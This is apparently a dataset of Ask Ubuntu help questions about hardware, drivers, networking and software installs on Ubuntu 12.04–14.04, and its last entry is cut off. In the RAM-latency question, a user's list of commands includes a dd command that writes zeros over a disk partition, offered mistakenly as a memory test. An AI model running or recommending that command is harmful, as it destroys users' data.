516597	usb hdd transfer speed varies	so the problem is , that usb speed varies all the time at download and transfers . if i connect it to windows/mac machine it works ok. for example i made screenshots of utorrent : http : //s27.postimg.org/8g7b7b07n/utorrent.jpg ubuntu version : root @ server : ~ # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty hdparm output : first try : root @ server : ~ # hdparm -tt /dev/sdc1 /dev/sdc1 : timing cached reads : 44 mb in 2.01 seconds = 21.91 mb/sec timing buffered disk reads : 2 mb in 5.12 seconds = 400.20 kb/sec second try : root @ server : ~ # hdparm -tt /dev/sdc1 /dev/sdc1 : timing cached reads : 92 mb in 2.01 seconds = 45.85 mb/sec timing buffered disk reads : 4 mb in 3.59 seconds = 1.11 mb/sec fdisk output : disk /dev/sdc : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2ee5b839 device boot start end blocks id system /dev/sdc1 2 2930277167 1465138583 b w95 fat32 thanks for any help .
516599	how to install mysql 5.1. if i already have 5.5. installed ?	currently i have mysql 5.5 installed localy . how can i install and use mysql 5.1 server ? i also need to be able to go back to 5.5. at one point .
516600	wired & & wireless not working , fresh install	i have just installed ubuntu 14.04 onto my desktop . it has been unable to establish a connection to the network , it wont even connect . if i give it a manual ip address , then it says that it has connected , but i ca n't ping the router or any other device on the network and i do n't get an internet connection . same problem with the wireless , just does n't connect . update : i just rebooted my system , and it said `` booting without full network configuration '' currently using ubuntu 14.04 on my laptop and its running fine on the same network . any ideas what the issue could be ? many thanks ryan
516603	cuda conflict with wine	every time i install wine on ubuntu 14.04 my cuda gets disabled , so i ca n't use gpu compute with cycles in blender . for some reason i can either use wine or cuda , not both . i forgot to mention that even the opencl ( open computing language ) driver gets disabled . i have tried both of the nvidia cuda toolkits , from the ubuntu software center and the cuda 6.5 toolkit from the nvidia website . unfortunately i get the same problem . i have three gpus - 2 gtx 760s and one gtx 560 ti . the moment i install wine , blender stops detecting them under the compute device . i have tried the nvidia-331 graphics driver and also nvidia-340 from the website . i do n't know what else to do . is there a workaround for this ?
516606	hardship veiwing pdf and trying adobe reader	on the immigration canada web page viewing pdf and some of them worked and some gave me this notice : please wait ... if this message is not eventually replaced by the proper contents of the document , your pdf viewer may not be able to display this type of document . you can upgrade to the latest version of adobe reader for windows速 , mac , or linux速 by visiting http : //www.adobe.com/go/reader_download . for more assistance with adobe reader visit http : //www.adobe.com/go/acrreader . windows is either a registered trademark or a trademark of microsoft corporation in the united states and/or other countries . mac is a trademark of apple inc. , registered in the united states and other countries . linux is the registered trademark of linus torvalds in the u.s. and other countrie on abobe 's page there is no linux or ubuntu option . i am using ubuntu 14.04 what do i do ?
516607	problem with m4a files	rhythmbox , vlc and totem instantly crash when opening a m4a file . when i run rhythmbox -d and play a m4a file , i receive this message : ( rhythmbox:9023 ) : gstreamer-critical ** : gst_structure_new_empty : assertion 'gst_structure_validate_name ( name ) ' failed ( 09:46:00 ) [ 0x26048a0 ] [ connection_closed_cb ] rb-metadata-dbus-service.c:218 : client > connection closed g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream > returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . segmentation fault ( core dumped ) also , i ca n't see the properties of m4a files ( right-click > properties crashes nautilus ) i tried reinstalling all the gstreamer-plugins and deleting the contents of ~/.gstreamer-0.10 to no avail . also tried purging and reinstalling rhythmbox many times . i 'm not sure if it 's related or not , but i had recently installed ffmpeg ( the actual one from the ppa ( ppa : jon-severinsson/ffmpeg ) ) . since i thought it could be related , i apt-get remove 'd it but it changed nothing . the same m4a files work with xine and in audacity , which leads me to believe it 's a problem with gstreamer ... but i 'm not sure what to try next . ideas ? thanks !
516610	problem booting dell latitude 3440 ubuntu	just got dell latitude 3440 with ubuntu preinstalled i want to install another os i tried to do it from cd , but the optical drive did not show in the boot options so i then tried to do it from flash drive the flash drive showed in boot options , and i set it to first option , but wo n't actually boot . i tried out the flash drive on a windows computer , and it booted fine . yes , i am inserting it in a usb2 slot now i have real problems , i ca n't boot even to ubuntu , and i ca n't get to boot options or setup . i just get an error message : ( initramfs ) unable to find a medium containing a live file system please help i am not experienced with ubuntu at all , so dumb-down the answers ... okay , i called dell . the answer is to choose os from the boot options , and then restart while mashing f12 , and then the cd appears in the boot options . then , you boot from the cd ( or flash drive , if you wish ) . but just in case anyone out there is trying to install windows this way , you first have to disable ubuntu somehow , because when windows is in the middle of installation , it restarts . but my computer restarted to ubuntu , and that interrupted the windows install . so i went the nuclear option . i used a flash drive with gparted to delete all the partitions except for the main one . but by the way , you also have to format the main partition as ntfs , or else windows wo n't install .
516616	how much context switching is too much ?	i am running ubuntu server 14.04 on an lenovo ideacentre d400 . the load average is never under 1.0 . so i started to take a deeper look . i do not find anything that could be responsable for this load . the only thing that seems to be `` too high '' is the cs value ( context swichtes ) . but how much context swichting is too much ? on my laptop ( lenovo thinkpad x220 ; ubuntu 14.04 ) i 've got cs values of over 10k at a load of ~0.8 . only running the system and chrome-browser . collecting these numbers using vmstat .
516617	upgrade from 13.10 to 14.04 `` rolled back ''	i 've tried to upgrade my kubuntu from 13.10 to 14.04 , through the notification popup appeared in my taskbar . the upgrade process started , it begun to download about 1800 packages , it downloaded almost all of them then the net went down and i decided to resume the upgrade at home . connected to my home wifi i restarted the process , the remaining packages were downloaded , the system started to install them . there was no error during packages installation , neither in the `` cleanup '' process to remove obsolete packages . i 've rebooted after the process was complete but right now seems that i still have a 13.10 installation ! it is written in /etc/lsb-release and the packages installed seems still old.. for example the kernel version is still 3.11.. i did n't see any error message or rollback procedure going on.. does someone knows what can be happened ? if i can find some logs to investigate ? i saw in /var/log/apt but there is very little information..
516621	virtualization of ubuntu 14.04 on macox using virtual box	i have 2 main questions related to the virtualization . first , after having installed ubuntu on vbox latest version on my macbook pro , the os is working fine but display setting is stucked in 800x600 . i have install vbox guest and extended but i still face the issue . second , the key : ~ { } [ ] ... and others are not mapped on the keyboard as it 's a shortcuts done under macosx . anyone know the procedure to have these characters working under ubuntu when ubuntu is virtualized on a macbook pro with a french keyboard ?
516622	/405050011390461/context1	after installing mir on ubuntu 14.04 desktop network connection shows /405050011390461/context1 . unable to delete this /405050011390461/context1 . i am unable to connect to the internet . there is a dir at /var/lib/ofono/40505001139061 . thanks
516628	ca n't get chrome to start at a specific desktop in openbox	i 'm using openbox ( ubuntu 14.04 lts , with compton ) . i 've configured all apps to start at specific desktops , with terminals at desktop 1 , spacefm at desktop 2 , and then finally , google chrome at desktop 4 . all of the programs start at the correct desktop , other than google chrome . ca n't seem to get it to start at desktop 4 . when starting chrome , it will start at the current desktop , not at desktop 4 . excerpt from my rc.xml file : < application name= '' /usr/bin/google-chrome '' > < desktop > 4 < /desktop > < layer > normal < /layer > < decor > no < /decor > < maximized > no < /maximized > < /application > i know that chrome is originally installed to /opt/google/chrome/chrome , i 've tried using that path , aswell as the /opt/google/chrome/google-chrome wrapper script . finally i symlinked /usr/bin/google-chrome to /opt/google/chrome/chrome , without any success . i have also tried having multiple entries in the rc.xml , in total 3 entries , the with the before mentioned binary locations . how do i get chrome to start at desktop 4 ?
516629	trying to run ubuntu 12.04 or 14.04 with old ati cards	first , i 've tried ubuntu 12.04 , ubuntu 11.04 , ubuntu 10.04 , xubuntu 11.04 , xubuntu 12.04 . video card is ati radeon 9600/9550/x1050 series . i 've done some digging before i decided to ask question here , found that : http : //wiki.cchtml.com/index.php/hardware # radeon_.28catalyst_.3c.3d_9.3_.26_open_source.29 http : //wiki.cchtml.com/index.php/ubuntu_precise_installation_guide # installing_proprietary_drivers_a.k.a._catalyst.2ffglrx is there a way to get it working with another driver on linux 12.04+ ? generally , the problem is that system freezes after few second if there is no acpi=off or nomodeset in boot options . with these options i have 800x600 maximum resolution . any ideas ? maybe there is different drivers or sth ? or is there a simple way to make 8.04 version stable with new and working repositories from newer version of xubuntu ? that 'd be easiest way to solve problem . but i 'd prefer new version anyway .
516630	no wireless networks found in wicd	i have a laptop thinkpad edge e430 , with xubuntu 12.04.4 lts installed on it . i 'm using wicd to manage my networks . my wired network works just fine , but i ca n't detect any wireless network ( `` no wireless networks found '' ) although i 've checked that there were several wireless networks available nearby ( i have a dualboot with windows ) . i 've reinstalled the wicd , just for case : sudo apt-get install -- reinstall wicd i 've tried this great askubuntu troubleshooting answer [ my wifi adapter is not working at all , how to troubleshoot ? ] : i 've installed all updates . i 've checked my network with lshw : sudo lshw -c network *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth2 version : 01 serial : 08:3e:8e : a2:91:9f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : f2d00000-f2d03fff i ran rfkill for possible software and hardware switches : rfkill list 0 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no i figured out that i have `` hardware requiring special care '' as mentioned at the bottom of the post so i followed attached link [ installing broadcom wireless drivers ] . my wireless card is : lspci -nn -d 14e4 : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) so the table suggested me to install bcmwl since my kernel version is 3.2.0-67-generic . sudo apt-get install bcmwl-kernel-source bcmwl-kernel-source is already the newest version . i 've rebooted my pc . and now i 'm stuck . can you help me solve the wireless network issue or at least locate the problem ? is it driver issue ? is it wicd issue ? is it bfu user issue ?
516631	group files in some folders	i have a external hard with some files and folders in it with a lot of extension such as *.pdf , *.mp3 , *.jpg and other extension that i do n't know what they are. , are stored in different folders and mixed with together . so my question is how can i list all file extension which is saved in my harddisk and then create some folders named as the same as the extension that i found and move all related files into own folder ? for ex : by searching or using any script i found *.bak , *.png and other extension in it , now i need to create folders with named bak_files , png_files and so on for other extension , then move all files into related folder .
516634	can not ccompile the basic opencv cpp program	i made the ~/.compile_opencv.sh as given https : //help.ubuntu.com/community/opencv on this website and then i made this file opencvtest.cpp with the following contents . the image path is a valid path . # include < opencv2/highgui/highgui.hpp > using namespace cv ; int main ( ) { mat img = imread ( `` /home/abkds/desktop/friends.jpg '' , cv_load_image_color ) ; imshow ( `` opencvtest '' , img ) ; waitkey ( 0 ) ; return 0 ; } i have created the alias opencv= '' ~/.compile_opencv.sh '' . but when i run it shows the following error . bash : /home/abkds/.compile_opencv.sh : permission denied instead of this i tried the whole command but even then it shows fatal error . opencvtest.cpp:1:39 : fatal error : opencv2/highgui/highgui.hpp : no such file or directory # include < opencv2/highgui/highgui.hpp > ^ compilation terminated . please help . thanks in advance
516638	in xfce4 , how can i associate an icon to an executable	ubuntu 12.04 , xfce4 . i run commands from the command line , not from a launcher . ( this should n't make a difference , but some replies have assumed i want to click on a launcher and that 's not the point . ) what i want : when i run the program /usr/bin/zathura ( a pdf viewer ) , i 'd like to see the icon zathura.png appear for each window in the windows menu ( the menu triggered by middle-mouse on background , or the one triggered by control-tab to cycle through windows ) . this is n't happening ! instead i 'm getting a generic icon . what i 've done : placed the icon zathura.png in /usr/share/app-install/icons ( which already contains the icon okular.png , which shows properly when i run okular ) . added the line icon=zathura to the file /usr/share/applications/zathura.desktop ( again in imitation of a similar file , okular.png ) . note : following tim 's suggest i 've replaced the imitative icon=zathura by a full pathname . the file , in its entirety , is this : [ desktop entry ] version=1.0 type=application name=zathura comment=a minimalistic document viewer exec=zathura % f terminal=false categories=office ; viewer ; icon=/usr/share/app-install/icons/zathura.png keywords=pdf ; ps ; postscript ; djvu ; document ; presentation ; restarted the window manager ( logged out and back in ) . made not the slightest difference ! i then set out to try to break the okular icon to see if i can find where the icon gets associated to an executable . i ca n't break it ! for instance , if i copy /usr/bin/okular to /usr/bin/fooooo and call that new executable , the window thus created still gets the okular icon , even though there is no fooooo.png or fooooo.desktop , or any .desktop with name=fooooo or exec=fooooo . where is the association between the executable and the icon made ? note : the point is not for the icon to appear on the desktop . it makes no difference to me whether it appears there or not . ( my desktop shows the contents of my home directory . )
516642	package manager issue after installing phusion passenger	i am using ubuntu 14.04 . i installed phusion passenger in my machine using the following commands . sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 561f9b9cac40b2f7 sudo apt-get install apt-transport-https ca-certificates echo 'deb https : //oss-binaries.phusionpassenger.com/apt/passenger trusty main ' | sudo tee /etc/apt/sources.list.d/passenger.list sudo chown root : /etc/apt/sources.list.d/passenger.list sudo chmod 600 /etc/apt/sources.list.d/passenger.list sudo apt-get update the installation is successful and i am also able to run passenger . but i am able to see the below error related to my package manager . because of this error software updater application is not working . can anybody help to solve this problem ?
516643	maximum space required for ubuntu repository	i am using ubuntu 12.10 ( quantal ) version and it is at eol . the repositories for older releases that are not supported get moved to an archive server . these repositories are available at http : //old-releases.ubuntu.com . now i have to set up this repository on my local server so that we can fetch packages from it instead of archive server . for setting repository we can use apt-mirror . i also refer different documentation like http : //www.unixmen.com/setup-local-repository-ubuntu-14-0413-1013-04-server/ http : //www.tecmint.com/setup-local-repositories-in-ubuntu/ but none of them specifically mentioned required maximum space . so i have a question how much maximum space required for setting ubuntu repository . my sources.list file is as follows deb http : //old-releases.ubuntu.com/ubuntu/ quantal main restricted universe multiverse deb-src http : //old-releases.ubuntu.com/ubuntu/ quantal main restricted universe multiverse deb http : //old-releases.ubuntu.com/ubuntu/ quantal-updates main restricted universe multiverse deb-src http : //old-releases.ubuntu.com/ubuntu/ quantal-updates main restricted universe multiverse deb http : //old-releases.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //old-releases.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //old-releases.ubuntu.com/ubuntu quantal-security main restricted universe multiverse deb-src http : //old-releases.ubuntu.com/ubuntu quantal-security main restricted universe multiverse
516648	skype do n't recognize hp pavilion dmi webcam	i have bought myself a hp pavilion dm1 to go traveling with , which has ubuntu 14.04.1 on it , but now ( a day before i leave for africa ! ) i realize the webcam is n't being recognized at all . i 'm guessing i need to figure out how to put the driver for it on the machine . my webcam works on cheese , so it is being detected , just not on skype or websites .
516649	launcher icons can not be changed	i deleted something cache folder since i can not move and delete icons from the launcher bar . i did a reset the icons , reinstall desktop and unity , the whole system ( did n't touch the /home ) could someone help me ? i have a 14.04. and i do n't find anything like my problem on forums thanks , andras .
516650	.tcl file not running	i have installed ns2 on ubuntu 12.04. when i am trying to run .tcl file following error is showing up : ajay @ ajay-inspiron-535s : ~ $ cd ajay ajay @ ajay-inspiron-535s : ~/ajay $ ns old.tcl could n't read file `` old.tcl '' : no such file or directory
516651	apache is not stopping on xampp ubuntu 12.04	i 'm using lampp on ubuntu 12.04 . all was working fine and after restarting my pc , i 'm facing a problem . i run `` sudo /opt/lampp/lampp start '' command and it show that all are running but on browser localhost is not working . i tried to stop lampp and run command `` sudo /opt/lampp/lampp stop '' but i 'm receibing following error xampp : stopping apache ... fail . apachectl returned 1 . xampp : stopping mysql ... ok. xampp : stopping proftpd ... kill : usage : kill [ -s sigspec | -n signum | -sigspec ] pid | jobspec ... or kill -l [ sigspec ] fail . kill returned 1 . please help me on this problem . i have googled and tried some things but no luck .
516654	user wallpaper the same as login wallpaper	i am using ubuntu 14.04 64-bits do you know any other solution for changing background to be the same as your login wallpaper , this where you choose user and log in . i am the only user on my laptop , and i like the fact that my desktop have the same wallpapers in these two places . i understand that when i am changing user desktop i am only change it as user , and if i want to change login desktop i need to be root . personally i do it by open terminal type sudo nautlius going to /usr/share/backgrounds copy file and change it`s name to one of the system wallpaper already is there and give to file right privileges . then i right click on screen and go to change desktop background and choose my wallpaper file .
516661	getdeb ... playdeb	i have looked on different sites ( including this one ) and looked and tried and i do n't seem to be able to find some useful information on how to install getdeb and playdeb on my machine . there 's a lot of info but those are only when the stuff is installed ! there are some instructions on the different linux forum but they are poorly expressed/written , the info is incomplete , sometimes they do n't pertain to my version of linux and sometimes they only amount to headaches and frustrations due to the lack of step-by-step comprehensive explanation . so i have tried and tried to follow certain instructions that i thought straight forward , only to find out that i have n't actually installed getdeb/playdeb but that i have downloaded a bunch of stuff that do n't amount to actually having a software but a bunch of useless repos . i can not find the softwares on my machine after following those steps , not a file to open that would actually be getdeb or playdeb , no folder named such , nothing ... i 've tried and looked for it in the synaptic package manager : did n't work , no actual software . i 've tried and looked for it in the applications launcher : did n't work , no actual software . i 've tried and looked for it from the terminal : did n't work , no actual software ! yes , all those tries ( besides the launcher ) downloaded a bunch of stuff , but i could n't actually find any software to launch ! is there anyone knowledgeable enough to concisely explain how to install those to an ubuntu-challenged person like me ? i 've only started using ubuntu in the past few months . i love it but i hate the constraints due to lack of standard install software . this issue alone can not make me want to return to windows , but the real lack of professional support and concise explanations might ! i do n't want to give up on linux ! help me ! thank you ! !
516665	3g modem on ubuntu 14.04	both my 3g modems ( uknown in this table ) does n't work on ubuntu 14.04 . i tried sim card push to 3g slot in notebook dell d630 and also with external 3g modem card . seme effect : broadband network i can create , but this network is not available after creating . restarting service network-manager does n't work also . /etc/wvdial.conf is empty . lsusb : bus 002 device 003 : id 1b1c:1a03 corsair bus 003 device 002 : id 413c:8140 dell computer corp. wireless 360 bluetooth bus 005 device 002 : id 04f3:02f4 elan microelectronics corp. 2.4g cordless mouse bus 007 device 002 : id 0b97:7761 o2 micro , inc. oz776 1.1 hub bus 007 device 003 : id 0483:2016 sgs thomson microelectronics fingerprint reader bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 004 : id 0b97:7772 o2 micro , inc. oz776 ccid smartcard reader lshal : udi = '/org/freedesktop/hal/devices/usb_device_b97_7772_noserial' info.linux.driver = 'usb ' ( string ) info.parent = '/org/freedesktop/hal/devices/usb_device_b97_7761_noserial ' ( string ) info.product = 'oz776 ccid smartcard reader ' ( string ) info.subsystem = 'usb_device ' ( string ) info.udi = '/org/freedesktop/hal/devices/usb_device_b97_7772_noserial ' ( string ) info.vendor = 'o2 micro , inc. ' ( string ) linux.device_file = '/dev/bus/usb/007/004 ' ( string ) linux.hotplug_type = 2 ( 0x2 ) ( int ) linux.subsystem = 'usb ' ( string ) linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1/7-1.2 ' ( string ) usb_device.bus_number = 7 ( 0x7 ) ( int ) usb_device.can_wake_up = true ( bool ) usb_device.configuration_value = 1 ( 0x1 ) ( int ) usb_device.device_class = 0 ( 0x0 ) ( int ) usb_device.device_protocol = 0 ( 0x0 ) ( int ) usb_device.device_revision_bcd = 272 ( 0x110 ) ( int ) usb_device.device_subclass = 0 ( 0x0 ) ( int ) usb_device.is_self_powered = true ( bool ) usb_device.linux.device_number = 4 ( 0x4 ) ( int ) usb_device.linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1/7-1.2 ' ( string ) usb_device.max_power = 0 ( 0x0 ) ( int ) usb_device.num_configurations = 1 ( 0x1 ) ( int ) usb_device.num_interfaces = 1 ( 0x1 ) ( int ) usb_device.num_ports = 0 ( 0x0 ) ( int ) usb_device.product = 'oz776 ccid smartcard reader ' ( string ) usb_device.product_id = 30578 ( 0x7772 ) ( int ) usb_device.speed = 12.0 ( 12 ) ( double ) usb_device.vendor = 'o2 micro , inc. ' ( string ) usb_device.vendor_id = 2967 ( 0xb97 ) ( int ) usb_device.version = 1.1 ( 1.1 ) ( double ) udi = '/org/freedesktop/hal/devices/usb_device_b97_7761_noserial' info.linux.driver = 'usb ' ( string ) info.parent = '/org/freedesktop/hal/devices/usb_device_1d6b_1_0000_00_1d_2 ' ( string ) info.product = 'oz776 1.1 hub ' ( string ) info.subsystem = 'usb_device ' ( string ) info.udi = '/org/freedesktop/hal/devices/usb_device_b97_7761_noserial ' ( string ) info.vendor = 'o2 micro , inc. ' ( string ) linux.device_file = '/dev/bus/usb/007/002 ' ( string ) linux.hotplug_type = 2 ( 0x2 ) ( int ) linux.subsystem = 'usb ' ( string ) linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1 ' ( string ) usb_device.bus_number = 7 ( 0x7 ) ( int ) usb_device.can_wake_up = true ( bool ) usb_device.configuration_value = 1 ( 0x1 ) ( int ) usb_device.device_class = 9 ( 0x9 ) ( int ) usb_device.device_protocol = 0 ( 0x0 ) ( int ) usb_device.device_revision_bcd = 272 ( 0x110 ) ( int ) usb_device.device_subclass = 0 ( 0x0 ) ( int ) usb_device.is_self_powered = true ( bool ) usb_device.linux.device_number = 2 ( 0x2 ) ( int ) usb_device.linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1 ' ( string ) usb_device.max_power = 2 ( 0x2 ) ( int ) usb_device.num_configurations = 1 ( 0x1 ) ( int ) usb_device.num_interfaces = 1 ( 0x1 ) ( int ) usb_device.num_ports = 4 ( 0x4 ) ( int ) usb_device.product = 'oz776 1.1 hub ' ( string ) usb_device.product_id = 30561 ( 0x7761 ) ( int ) usb_device.speed = 12.0 ( 12 ) ( double ) usb_device.vendor = 'o2 micro , inc. ' ( string ) usb_device.vendor_id = 2967 ( 0xb97 ) ( int ) usb_device.version = 1.1 ( 1.1 ) ( double ) udi = '/org/freedesktop/hal/devices/usb_device_b97_7761_noserial_if0' info.linux.driver = 'hub ' ( string ) info.parent = '/org/freedesktop/hal/devices/usb_device_b97_7761_noserial ' ( string ) info.product = 'usb hub interface ' ( string ) info.subsystem = 'usb ' ( string ) info.udi = '/org/freedesktop/hal/devices/usb_device_b97_7761_noserial_if0 ' ( string ) linux.hotplug_type = 2 ( 0x2 ) ( int ) linux.subsystem = 'usb ' ( string ) linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1/7-1:1.0 ' ( string ) usb.bus_number = 7 ( 0x7 ) ( int ) usb.can_wake_up = true ( bool ) usb.configuration_value = 1 ( 0x1 ) ( int ) usb.device_class = 9 ( 0x9 ) ( int ) usb.device_protocol = 0 ( 0x0 ) ( int ) usb.device_revision_bcd = 272 ( 0x110 ) ( int ) usb.device_subclass = 0 ( 0x0 ) ( int ) usb.interface.class = 9 ( 0x9 ) ( int ) usb.interface.number = 0 ( 0x0 ) ( int ) usb.interface.protocol = 0 ( 0x0 ) ( int ) usb.interface.subclass = 0 ( 0x0 ) ( int ) usb.is_self_powered = true ( bool ) usb.linux.device_number = 2 ( 0x2 ) ( int ) usb.linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1/7-1:1.0 ' ( string ) usb.max_power = 2 ( 0x2 ) ( int ) usb.num_configurations = 1 ( 0x1 ) ( int ) usb.num_interfaces = 1 ( 0x1 ) ( int ) usb.num_ports = 4 ( 0x4 ) ( int ) usb.product = 'usb hub interface ' ( string ) usb.product_id = 30561 ( 0x7761 ) ( int ) usb.speed = 12.0 ( 12 ) ( double ) usb.vendor = 'o2 micro , inc. ' ( string ) usb.vendor_id = 2967 ( 0xb97 ) ( int ) usb.version = 1.1 ( 1.1 ) ( double ) udi = '/org/freedesktop/hal/devices/usb_device_b97_7772_noserial' info.linux.driver = 'usb ' ( string ) info.parent = '/org/freedesktop/hal/devices/usb_device_b97_7761_noserial ' ( string ) info.product = 'oz776 ccid smartcard reader ' ( string ) info.subsystem = 'usb_device ' ( string ) info.udi = '/org/freedesktop/hal/devices/usb_device_b97_7772_noserial ' ( string ) info.vendor = 'o2 micro , inc. ' ( string ) linux.device_file = '/dev/bus/usb/007/004 ' ( string ) linux.hotplug_type = 2 ( 0x2 ) ( int ) linux.subsystem = 'usb ' ( string ) linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1/7-1.2 ' ( string ) usb_device.bus_number = 7 ( 0x7 ) ( int ) usb_device.can_wake_up = true ( bool ) usb_device.configuration_value = 1 ( 0x1 ) ( int ) usb_device.device_class = 0 ( 0x0 ) ( int ) usb_device.device_protocol = 0 ( 0x0 ) ( int ) usb_device.device_revision_bcd = 272 ( 0x110 ) ( int ) usb_device.device_subclass = 0 ( 0x0 ) ( int ) usb_device.is_self_powered = true ( bool ) usb_device.linux.device_number = 4 ( 0x4 ) ( int ) usb_device.linux.sysfs_path = '/sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1/7-1.2 ' ( string ) usb_device.max_power = 0 ( 0x0 ) ( int ) usb_device.num_configurations = 1 ( 0x1 ) ( int ) usb_device.num_interfaces = 1 ( 0x1 ) ( int ) usb_device.num_ports = 0 ( 0x0 ) ( int ) usb_device.product = 'oz776 ccid smartcard reader ' ( string ) usb_device.product_id = 30578 ( 0x7772 ) ( int ) usb_device.speed = 12.0 ( 12 ) ( double ) usb_device.vendor = 'o2 micro , inc. ' ( string ) usb_device.vendor_id = 2967 ( 0xb97 ) ( int ) usb_device.version = 1.1 ( 1.1 ) ( double ) integrated modem is : dell wireless 5520 mobile broadband ( tri-band hsdpa 3.6 ) mini-card with service from at & t ( us ) and vodafone ( select countries in europe ) dell wireless 5720 mobile broadband ( evdo rev a ) mini-card with service from verizon wireless ( us ) , sprint ( us ) and telus ( canada ) external is : t-mobile ip wireless ue pcmmcia v3 tx
516675	break up of power measured by nmon	i have tried calculating the power usage by a process using power-top tools . for example if i measure power usage by a process using `` nmon '' and it comes out to be say 3 watts . is there some tool by which i can view the breakup of this 3 watts under different heads such as memory , cpu , etc . such as how much power was consumed in which component ?
516677	font and theme changed	suddenly , font and theme of ubuntu have changed . i do n't really care about font , but theme is so ugly.have a look : it 's like windows 95 ! anyone had similar problem , and is there a solution ? thanks ! edit1 : this is not the problem with vm , other programs have ugly theme too as you can see ( play on linux ) . this is problem with ubuntu .
516679	after memory upgrade system boot to blank screen	i just upgraded a pc from 2g of ram ( 2x1gb ) to 3g ( 2x1g + 2x512m ) after finding a pair of memory modules in a drawer . the pc boots ok , i see grub welcoming message ( just a second ) and then screen goes off . the system boots correctly ( there is disk activity , and if i push power just once , the system shuts down after half a minute of intense activity ) ; but the screen switches off . i tried alt+ctrl+f1 but i can not go to a text session . do i need to change any grub parameter ? the system is an amd64 with ubuntu 12.04 64bits installed .
516681	how do i check ram latency ?	i need to buy new ram . first i need to know speed > > done second i need to know latency > > how ? all i tried from google . dmidecode -- type memory dmidecode 2.11 dd if=/dev/zero of=/dev/sda2 bs=1g count=1 oflag=direct apt-get install hardinfo apt-get install sysinfo cat /proc/meminfo cat /var/log/dmesg | grep memory decode-dimms update-pciids lshw -c memory | grep clock apt-get install lshw lshw -c memory
516683	wired network drops after few minutes / seconds	recently i installed ubuntu 14.04 on my new laptop , lenovo l440 . will doing the installation i used wifi . with a wifi everything works perfectly , the problem is when i plugged a lan cable . the os recognized the new connection and i can see the 2 arrows , i am also get a connection for few minutes/seconds . the problem is that i ca n't connect to internet after minutes . the connection indicator ( 2 arrows ) still shows me i am connect to the network . also if i press on the connection it reconnect but drops again . any suggestion will be greatly appreciate .
516684	uninstall ubuntu os-uninstaller	i recently installed ubuntu 12.04 ( i had the .iso already and couldnt be bothered downloading 14.04 ) alongside a broken windows 7 . grub shows windows 7 and ubuntu as normal before we go any further , i am not planning to uninstall ubuntu in the near future . i just want to know how to do it just in case i want to know if it 's possible to uninstall ubuntu using the os-uninstaller , while using ubuntu to boot the uninstaller . will it work , and , if so , what will i be left with ?
516685	how to remove all traces of a bad install	i tried installing ubuntu , and it seemed to work . however , i messed up and put it on the wrong drive . then i panicked , and tried to remove it . so now , when i try to install it after removing all i can , it says that no medium can be found and the grub loader does n't work properly . so i need to figure out how to make my system how it was before i touched ubuntu , so i can put it on properly . i am also trying to dual boot my system , and windows 7 runs fine .
516687	how do i make a custom ubuntu iso for fully offline installations ?	i am based in india and we do n't have reliable internet everywhere . i would like to build an ubuntu installer iso with the following features : all proprietary drivers should be available offline at least one complete language pack ( say , english/usa ) should be available offline certain extra packages and finally , things like flashinstaller or chrome , which download data from the web while installing , should also work . how do i go about building something like this ? -
516690	pdf fonts are wrong in adobe reader	i recently installed adobe reader but when i open a pdf file it has wrong text fonts ! this does not happen with the default pdf reader !
516692	frostwire installation problem	i 've been using ubuntu for a while now but am not very proficient with some of the more technical stuff . recently i have had trouble with skype and frostwire , two programmes that used to work perfectly . having contacted skype , i 've been informed that my os is now outdated but that i may be able to download a compatible version in a fortnight or so . meanwhile , i recently tried to update frostwire ( which had stopped working for some reason ) . i uninstalled and attempted to reinstall it , however , every time i attempted to do so i got the same message : ( reading database ... 161198 files and directories currently installed . ) unpacking frostwire ( from ... /frostwire-5.7.6.all.deb ) ... dpkg-deb : file `/home/david/downloads/frostwire-5.7.6.all.deb ' contains ununders tood data member data.tar.xz , giving up dpkg : error processing /home/david/downloads/frostwire-5.7.6.all.deb ( -- install ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 errors were encountered while processing : /home/david/downloads/frostwire-5.7.6.all.deb basically , i have two questions : 1 ) is it time i upgraded my os ? distribution name & version is linux mint 9 isadora . kernel version : linux david-laptop 2.6.32-21-generic # 32-ubuntu smp fri apr 16 08:09:38 utc 2010 x 86_64 gnu/linux 2 ) if not , what can i do about the problem i have encountered installing 